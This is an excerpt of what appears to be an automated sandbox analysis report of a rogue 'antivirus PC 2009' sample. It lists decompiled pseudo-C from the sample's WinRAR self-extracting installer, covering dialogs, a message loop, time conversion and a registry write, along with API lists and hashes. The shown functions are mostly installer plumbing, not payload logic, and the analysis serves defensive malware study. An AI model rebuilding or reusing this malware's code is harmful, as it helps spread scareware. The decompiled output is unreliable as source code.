                                                                                                                                                      • API ID: FileName$OpenSave$CommCurrentDirectoryErrorExtended
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1809602070-0
                                                                                                                                                      • Opcode ID: 8b641a37d2e3cded532aa378942fbf2e671189089aa577b060b958644557db49
                                                                                                                                                      • Instruction ID: 3fc8b8bfb49f4cbb00dcab2165558d5f44084b3bd698ed4426c068d94847fa5b
                                                                                                                                                      • Opcode Fuzzy Hash: 8b641a37d2e3cded532aa378942fbf2e671189089aa577b060b958644557db49
                                                                                                                                                      • Instruction Fuzzy Hash: 1A31A0759012199BCB11EFA98D49BCF7BB8AF44354F10802BFA04F3281C7789955CBAA
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 65%
                                                                                                                                                      			E004064BF(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				void* _v12;
                                                                                                                                                      				long _v16;
                                                                                                                                                      				struct tagMSG _v44;
                                                                                                                                                      				long _t24;
                                                                                                                                                      				intOrPtr* _t29;
                                                                                                                                                      				intOrPtr* _t32;
                                                                                                                                                      				intOrPtr* _t34;
                                                                                                                                                      				intOrPtr* _t36;
                                                                                                                                                      				struct HWND__* _t46;
                                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                                      
                                                                                                                                                      				_t46 = 0;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_t24 = GetTickCount();
                                                                                                                                                      				_t53 = _a4;
                                                                                                                                                      				_v16 = _t24;
                                                                                                                                                      				while(1) {
                                                                                                                                                      					_push( &_v12);
                                                                                                                                                      					_push(_t53);
                                                                                                                                                      					if( *((intOrPtr*)( *_t53 + 0x48))() >= 0 && _v12 != _t46) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					if(GetTickCount() - _v16 > 0x2710) {
                                                                                                                                                      						break;
                                                                                                                                                      					} else {
                                                                                                                                                      						if(PeekMessageA( &_v44, _t46, _t46, _t46, _t46) != 0) {
                                                                                                                                                      							GetMessageA( &_v44, _t46, _t46, _t46);
                                                                                                                                                      							TranslateMessage( &_v44);
                                                                                                                                                      							DispatchMessageA( &_v44);
                                                                                                                                                      						}
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = _v12;
                                                                                                                                                      				if(_t29 != _t46) {
                                                                                                                                                      					_push( &_v8);
                                                                                                                                                      					_push(0x412858);
                                                                                                                                                      					_push(_t29);
                                                                                                                                                      					if( *((intOrPtr*)( *_t29))() >= 0) {
                                                                                                                                                      						_t32 = _v8;
                                                                                                                                                      						_push(_t32);
                                                                                                                                                      						if( *((intOrPtr*)( *_t32 + 0x20))() >= 0) {
                                                                                                                                                      							_t36 = _v8;
                                                                                                                                                      							_t46 = _t46 & 0xffffff00 |  *((intOrPtr*)( *_t36 + 0x14))(_t36, _a8) >= 0x00000000;
                                                                                                                                                      						}
                                                                                                                                                      						_t34 = _v8;
                                                                                                                                                      						 *((intOrPtr*)( *_t34 + 8))(_t34);
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t46;
                                                                                                                                                      			}














                                                                                                                                                      0x004064cd
                                                                                                                                                      0x004064d0
                                                                                                                                                      0x004064d3
                                                                                                                                                      0x004064d6
                                                                                                                                                      0x004064d8
                                                                                                                                                      0x004064db
                                                                                                                                                      0x004064de
                                                                                                                                                      0x004064e3
                                                                                                                                                      0x004064e4
                                                                                                                                                      0x004064ea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004064fb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004064fd
                                                                                                                                                      0x0040650d
                                                                                                                                                      0x00406516
                                                                                                                                                      0x00406520
                                                                                                                                                      0x0040652a
                                                                                                                                                      0x0040652a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040650d
                                                                                                                                                      0x004064fb
                                                                                                                                                      0x00406532
                                                                                                                                                      0x00406537
                                                                                                                                                      0x0040653e
                                                                                                                                                      0x0040653f
                                                                                                                                                      0x00406544
                                                                                                                                                      0x00406549
                                                                                                                                                      0x0040654b
                                                                                                                                                      0x00406550
                                                                                                                                                      0x00406556
                                                                                                                                                      0x00406558
                                                                                                                                                      0x00406566
                                                                                                                                                      0x00406566
                                                                                                                                                      0x00406569
                                                                                                                                                      0x0040656f
                                                                                                                                                      0x0040656f
                                                                                                                                                      0x00406549
                                                                                                                                                      0x00406578

                                                                                                                                                      APIs
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004064D6
                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004064F1
                                                                                                                                                      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00406505
                                                                                                                                                      • GetMessageA.USER32 ref: 00406516
                                                                                                                                                      • TranslateMessage.USER32(?), ref: 00406520
                                                                                                                                                      • DispatchMessageA.USER32 ref: 0040652A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Message$CountTick$DispatchPeekTranslate
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906477200-0
                                                                                                                                                      • Opcode ID: 627e4e436f17076fa03f17ff94e42819feb2b054caf09be72856c85dd9c5ed32
                                                                                                                                                      • Instruction ID: afe5134b9435a3290b6b6510f0e4d264152f229aed93d055ae6497dd3edfb6b5
                                                                                                                                                      • Opcode Fuzzy Hash: 627e4e436f17076fa03f17ff94e42819feb2b054caf09be72856c85dd9c5ed32
                                                                                                                                                      • Instruction Fuzzy Hash: B321C571A00109AFDB00DFA9DD88DDEBBBCEF48745B1484AAE502E7260D774DE55CB24
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040BB63(char* _a4, long _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                      				int _t14;
                                                                                                                                                      				void* _t15;
                                                                                                                                                      				void* _t18;
                                                                                                                                                      				char* _t19;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      				void* _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				char* _t23;
                                                                                                                                                      				void* _t24;
                                                                                                                                                      				char* _t26;
                                                                                                                                                      
                                                                                                                                                      				while(1) {
                                                                                                                                                      					 *0x419ee0 = _a12;
                                                                                                                                                      					 *0x419ee4 = _a16;
                                                                                                                                                      					 *0x419ed8 = _a20;
                                                                                                                                                      					if( *0x419ede == 0) {
                                                                                                                                                      						if( *0x419edf == 0) {
                                                                                                                                                      							_t14 = DialogBoxParamA( *0x414c74, "REPLACEFILEDLG",  *0x419f80, E0040AE70, _a8);
                                                                                                                                                      						} else {
                                                                                                                                                      							_t14 = 2;
                                                                                                                                                      						}
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = 1;
                                                                                                                                                      					}
                                                                                                                                                      					_t15 = _t14 - 1;
                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t18 = _t15 - 1;
                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                      						L15:
                                                                                                                                                      						_t19 = _a4;
                                                                                                                                                      						 *_t19 = 0x4e;
                                                                                                                                                      						return _t19;
                                                                                                                                                      					}
                                                                                                                                                      					_t20 = _t18 - 1;
                                                                                                                                                      					if(_t20 == 0) {
                                                                                                                                                      						 *0x419ede = 1;
                                                                                                                                                      						break;
                                                                                                                                                      					}
                                                                                                                                                      					_t21 = _t20 - 1;
                                                                                                                                                      					if(_t21 != 0) {
                                                                                                                                                      						_t22 = _t21 - 1;
                                                                                                                                                      						if(_t22 == 0) {
                                                                                                                                                      							_t23 = _a4;
                                                                                                                                                      							 *0x419f78 = 1;
                                                                                                                                                      							 *_t23 = 0x43;
                                                                                                                                                      							return _t23;
                                                                                                                                                      						}
                                                                                                                                                      						_t24 = _t22 - 1;
                                                                                                                                                      						if(_t24 != 0) {
                                                                                                                                                      							return _t24;
                                                                                                                                                      						}
                                                                                                                                                      						 *0x419edf = 1;
                                                                                                                                                      						goto L15;
                                                                                                                                                      					}
                                                                                                                                                      					if(DialogBoxParamA( *0x414c74, "RENAMEDLG",  *0x419f80, E0040B16C, _a8) == 0) {
                                                                                                                                                      						continue;
                                                                                                                                                      					}
                                                                                                                                                      					_t26 = _a4;
                                                                                                                                                      					 *_t26 = 0x52;
                                                                                                                                                      					return _t26;
                                                                                                                                                      				}
                                                                                                                                                      				 *_a4 = 0x59;
                                                                                                                                                      				return SetFileAttributesA(_a8, 0);
                                                                                                                                                      			}













                                                                                                                                                      0x0040bb6d
                                                                                                                                                      0x0040bb77
                                                                                                                                                      0x0040bb7f
                                                                                                                                                      0x0040bb87
                                                                                                                                                      0x0040bb8c
                                                                                                                                                      0x0040bb9a
                                                                                                                                                      0x0040bbba
                                                                                                                                                      0x0040bb9c
                                                                                                                                                      0x0040bb9e
                                                                                                                                                      0x0040bb9e
                                                                                                                                                      0x0040bb8e
                                                                                                                                                      0x0040bb90
                                                                                                                                                      0x0040bb90
                                                                                                                                                      0x0040bbbc
                                                                                                                                                      0x0040bbbd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbbf
                                                                                                                                                      0x0040bbc0
                                                                                                                                                      0x0040bbfc
                                                                                                                                                      0x0040bbfc
                                                                                                                                                      0x0040bbff
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbff
                                                                                                                                                      0x0040bbc2
                                                                                                                                                      0x0040bbc3
                                                                                                                                                      0x0040bc16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc16
                                                                                                                                                      0x0040bbc5
                                                                                                                                                      0x0040bbc6
                                                                                                                                                      0x0040bbef
                                                                                                                                                      0x0040bbf0
                                                                                                                                                      0x0040bc04
                                                                                                                                                      0x0040bc07
                                                                                                                                                      0x0040bc11
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bc11
                                                                                                                                                      0x0040bbf2
                                                                                                                                                      0x0040bbf3
                                                                                                                                                      0x0040bc30
                                                                                                                                                      0x0040bc30
                                                                                                                                                      0x0040bbf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbf5
                                                                                                                                                      0x0040bbe5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbe7
                                                                                                                                                      0x0040bbea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bbea
                                                                                                                                                      0x0040bc25
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DialogParam
                                                                                                                                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                      • API String ID: 665744214-56093855
                                                                                                                                                      • Opcode ID: 9f7391a969908141affd3e1506dfeb8c0551ac1ff87ee18be0e998d9c8f1eadc
                                                                                                                                                      • Instruction ID: 7fae9892f9a237f55cab6e7937486e9afdf0d110a154038ee0e2284b36008d7f
                                                                                                                                                      • Opcode Fuzzy Hash: 9f7391a969908141affd3e1506dfeb8c0551ac1ff87ee18be0e998d9c8f1eadc
                                                                                                                                                      • Instruction Fuzzy Hash: 86214C34158249ABDB11CF24DC11BD63FA0E705344F188076E901AA2E5C7B9AD50DBAD
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                      			E0040B16C(struct HWND__* _a4, intOrPtr _a8, signed short _a12, CHAR* _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                      				void* _t22;
                                                                                                                                                      				CHAR* _t23;
                                                                                                                                                      
                                                                                                                                                      				_t21 = _a4;
                                                                                                                                                      				_t23 = _a16;
                                                                                                                                                      				E00403059(_t22, _t21, _a8, _a12, _t23, "RENAMEDLG", 0, 0);
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					 *0x41f320 = _t23;
                                                                                                                                                      					SetDlgItemTextA(_t21, 0x65, _t23);
                                                                                                                                                      					SetDlgItemTextA(_t21, 0x66, _t23);
                                                                                                                                                      					L9:
                                                                                                                                                      					return 1;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t17 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t17 == 0) {
                                                                                                                                                      					SendDlgItemMessageA(_t21, 0x66, 0xd, 0x50,  *0x41f320);
                                                                                                                                                      					_push(1);
                                                                                                                                                      					L6:
                                                                                                                                                      					EndDialog(_t21, ??);
                                                                                                                                                      					goto L9;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t17 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L6;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}








                                                                                                                                                      0x0040b170
                                                                                                                                                      0x0040b175
                                                                                                                                                      0x0040b189
                                                                                                                                                      0x0040b191
                                                                                                                                                      0x0040b196
                                                                                                                                                      0x0040b1d4
                                                                                                                                                      0x0040b1da
                                                                                                                                                      0x0040b1e0
                                                                                                                                                      0x0040b1e2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1e4
                                                                                                                                                      0x0040b199
                                                                                                                                                      0x0040b1a5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1a5
                                                                                                                                                      0x0040b19f
                                                                                                                                                      0x0040b1a0
                                                                                                                                                      0x0040b1c0
                                                                                                                                                      0x0040b1c6
                                                                                                                                                      0x0040b1aa
                                                                                                                                                      0x0040b1ab
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1ab
                                                                                                                                                      0x0040b1a3
                                                                                                                                                      0x0040b1a9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b1a9
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 0040B1AB
                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000066,0000000D,00000050,?), ref: 0040B1C0
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B1DA
                                                                                                                                                      • SetDlgItemTextA.USER32 ref: 0040B1E0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Item$Text$DialogMessageSend
                                                                                                                                                      • String ID: RENAMEDLG
                                                                                                                                                      • API String ID: 1109518134-3299779563
                                                                                                                                                      • Opcode ID: 3fbf5bdcea51cc42e20824fde63b58d57c09e04d5c0432ec42e38d30058d4e34
                                                                                                                                                      • Instruction ID: bf5bbbd193f32c1bedadc85709c849c00436e1c41758884dc092393b0bbf659d
                                                                                                                                                      • Opcode Fuzzy Hash: 3fbf5bdcea51cc42e20824fde63b58d57c09e04d5c0432ec42e38d30058d4e34
                                                                                                                                                      • Instruction Fuzzy Hash: 5801B172100218B6D7205FA2AC48FA73F2DEB457D0F004422B619A90C0C7B99821D7BC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040B908(void* __esi, char* _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				int _v12;
                                                                                                                                                      				char _v1036;
                                                                                                                                                      				long _t9;
                                                                                                                                                      				void* _t19;
                                                                                                                                                      				intOrPtr _t23;
                                                                                                                                                      				intOrPtr _t24;
                                                                                                                                                      
                                                                                                                                                      				_t23 =  *0x419f90; // 0x0
                                                                                                                                                      				if(_t23 != 0) {
                                                                                                                                                      					_t24 =  *0x418ed0; // 0x43
                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                      						E0040B8DA( &_v1036, "C:\Program Files (x86)\antiviruspc2009");
                                                                                                                                                      						_t9 = RegCreateKeyExA(0x80000001, "Software\\WinRAR SFX", 0, 0, 0, 0x20006, 0,  &_v8,  &_v12);
                                                                                                                                                      						if(_t9 == 0) {
                                                                                                                                                      							RegSetValueExA(_v8,  &_v1036, 0, 1, _a4, E0040A35D(_t19, _a4) + 1);
                                                                                                                                                      							return RegCloseKey(_v8);
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t9;
                                                                                                                                                      			}










                                                                                                                                                      0x0040b914
                                                                                                                                                      0x0040b91a
                                                                                                                                                      0x0040b91c
                                                                                                                                                      0x0040b922
                                                                                                                                                      0x0040b930
                                                                                                                                                      0x0040b950
                                                                                                                                                      0x0040b959
                                                                                                                                                      0x0040b975
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040b97e
                                                                                                                                                      0x0040b959
                                                                                                                                                      0x0040b922
                                                                                                                                                      0x0040b986

                                                                                                                                                      APIs
                                                                                                                                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\WinRAR SFX,00000000,00000000,00000000,00020006,00000000,?,?,C:\Program Files (x86)\antiviruspc2009,?,00000000), ref: 0040B950
                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000001,?), ref: 0040B975
                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0040B97E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                      • String ID: C:\Program Files (x86)\antiviruspc2009$Software\WinRAR SFX
                                                                                                                                                      • API String ID: 1818849710-3504043858
                                                                                                                                                      • Opcode ID: bb2666ba06deac227cf65bb7cd8f303db7ff7d91d5871e941530142aac470636
                                                                                                                                                      • Instruction ID: 94608505a7990a78563a11b73d6731a43fbb77e82655d4229a1030d46660d902
                                                                                                                                                      • Opcode Fuzzy Hash: bb2666ba06deac227cf65bb7cd8f303db7ff7d91d5871e941530142aac470636
                                                                                                                                                      • Instruction Fuzzy Hash: 990162B2400208BEEB109B909D41EEBBF2DEB04388F144176BB41B1161D7755E559B6C
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00406C31(void* __ebx, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                                                                      				void* _t7;
                                                                                                                                                      				void* _t11;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				long _t26;
                                                                                                                                                      				struct HWND__* _t27;
                                                                                                                                                      
                                                                                                                                                      				_t7 = _a8 - 1;
                                                                                                                                                      				_t27 = _a4;
                                                                                                                                                      				_t26 = _a16;
                                                                                                                                                      				if(_t7 == 0) {
                                                                                                                                                      					E00406B8E(__ebx, GetWindowLongA(_t27, 0xffffffeb), __eflags, _t27);
                                                                                                                                                      				} else {
                                                                                                                                                      					_t11 = _t7 - 1;
                                                                                                                                                      					if(_t11 == 0) {
                                                                                                                                                      						E00406475(GetWindowLongA(_t27, 0xffffffeb));
                                                                                                                                                      					} else {
                                                                                                                                                      						_t14 = _t11 - 3;
                                                                                                                                                      						if(_t14 == 0) {
                                                                                                                                                      							E004064A4(GetWindowLongA(_t27, 0xffffffeb), _t26 & 0x0000ffff, _t26 >> 0x10);
                                                                                                                                                      						} else {
                                                                                                                                                      							if(_t14 == 0x7c) {
                                                                                                                                                      								SetWindowLongA(_t27, 0xffffffeb,  *_t26);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return DefWindowProcA(_t27, _a8, _a12, _t26);
                                                                                                                                                      			}








                                                                                                                                                      0x00406c37
                                                                                                                                                      0x00406c39
                                                                                                                                                      0x00406c3d
                                                                                                                                                      0x00406c40
                                                                                                                                                      0x00406c96
                                                                                                                                                      0x00406c42
                                                                                                                                                      0x00406c42
                                                                                                                                                      0x00406c43
                                                                                                                                                      0x00406c83
                                                                                                                                                      0x00406c45
                                                                                                                                                      0x00406c45
                                                                                                                                                      0x00406c48
                                                                                                                                                      0x00406c71
                                                                                                                                                      0x00406c4a
                                                                                                                                                      0x00406c4d
                                                                                                                                                      0x00406c54
                                                                                                                                                      0x00406c54
                                                                                                                                                      0x00406c4d
                                                                                                                                                      0x00406c48
                                                                                                                                                      0x00406c43
                                                                                                                                                      0x00406cac

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000011.00000002.421736764.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000011.00000002.421706561.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422560908.0000000000412000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422571574.0000000000414000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422796699.000000000041E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      • Associated: 00000011.00000002.422861556.0000000000421000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_17_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Long$Proc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3468714886-0
                                                                                                                                                      • Opcode ID: 5b6488ec1d90df0595f4f4a9305c77c29eaa8b8cf69bc4252cccd780c0b04db9
                                                                                                                                                      • Instruction ID: b0deada768a9c0b0a5749325179a27a2743b231c5d97017feb3ce6524bfdf74a
                                                                                                                                                      • Opcode Fuzzy Hash: 5b6488ec1d90df0595f4f4a9305c77c29eaa8b8cf69bc4252cccd780c0b04db9
                                                                                                                                                      • Instruction Fuzzy Hash: 0201843110911477DF042F69AE18CAF3669DE8A320311473BF557F22E1CB78A931966E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040E04D(void* __ebx, signed int* __ecx, FILETIME* _a4) {
                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                      				struct _SYSTEMTIME _v36;
                                                                                                                                                      				signed int _t34;
                                                                                                                                                      				void* _t37;
                                                                                                                                                      				signed int _t50;
                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                      				signed int* _t57;
                                                                                                                                                      
                                                                                                                                                      				_t57 = __ecx;
                                                                                                                                                      				FileTimeToLocalFileTime(_a4,  &_v12);
                                                                                                                                                      				FileTimeToSystemTime( &_v12,  &_v36);
                                                                                                                                                      				_t34 = _v36.wDay & 0x0000ffff;
                                                                                                                                                      				_t50 = _v36.wMonth & 0x0000ffff;
                                                                                                                                                      				_t51 = _v36.wYear & 0x0000ffff;
                                                                                                                                                      				_t57[3] = _v36.wHour & 0x0000ffff;
                                                                                                                                                      				_t57[2] = _t34;
                                                                                                                                                      				_t57[4] = _v36.wMinute & 0x0000ffff;
                                                                                                                                                      				_t57[8] = _t34 - 1;
                                                                                                                                                      				_t57[5] = _v36.wSecond & 0x0000ffff;
                                                                                                                                                      				_t37 = 1;
                                                                                                                                                      				 *_t57 = _v36.wYear & 0x0000ffff;
                                                                                                                                                      				_t57[1] = _t50;
                                                                                                                                                      				_t57[7] = _v36.wDayOfWeek & 0x0000ffff;
                                                                                                                                                      				if(_t50 > 1) {
                                                                                                                                                      					_t56 = 0x4140ec;
                                                                                                                                                      					do {
                                                                                                                                                      						_t57[8] = _t57[8] +  *_t56;
                                                                                                                                                      						_t37 = _t37 + 1;
                                                                                                                                                      						_t56 = _t56 + 4;
                                                                                                                                                      					} while (_t37 < _t50);
                                                                                                                                                      				}
                                                                                                                                                      				if(_t50 > 2 && E0040E018(_t51) != 0) {
                                                                                                                                                      					_t57[8] = _t57[8] + 1;
                                                                                                                                                      				}
                                                                                                                                                      				_v36.wMilliseconds = 0;
                                                                                                                                                      				SystemTimeToFileTime( &_v36,  &_v20);
                                                                                                                                                      				_t57[6] = _v12.dwLowDateTime - _v20.dwLowDateTime;
                                                                                                                                                      				return _t57;
                                                                                                                                                      			}











                                                                                                                                                      0x0040e05c
                                                                                                                                                      0x0040e05e
                                                                                                                                                      0x0040e06c
                                                                                                                                                      0x0040e076
                                                                                                                                                      0x0040e07a
                                                                                                                                                      0x0040e07e
                                                                                                                                                      0x0040e082
                                                                                                                                                      0x0040e089
                                                                                                                                                      0x0040e08c
                                                                                                                                                      0x0040e094
                                                                                                                                                      0x0040e099
                                                                                                                                                      0x0040e0a0
                                                                                                                                                      0x0040e0a1
                                                                                                                                                      0x0040e0a3
                                                                                                                                                      0x0040e0a6
                                                                                                                                                      0x0040e0ab
                                                                                                                                                      0x0040e0ad
                                                                                                                                                      0x0040e0b3
                                                                                                                                                      0x0040e0b5
                                                                                                                                                      0x0040e0b8
                                                                                                                                                      0x0040e0b9
                                                                                                                                                      0x0040e0bc
                                                                                                                                                      0x0040e0c0
                                                                                                                                                      0x0040e0c4
                                                                                                                                                      0x0040e0d0
                                                                                                                                                      0x0040e0d0
                                                                                                                                                      0x0040e0d5
                                                                                                                                                      0x0040e0e1
                                                                                                                                                      0x0040e0ee
                                                                                                                                                      0x0040e0f5

                                                                                                                                                      APIs
                                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,01000000,00000000,?,?,?,?), ref: 0040E05E
                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040E06C
                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 0040E0E1
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
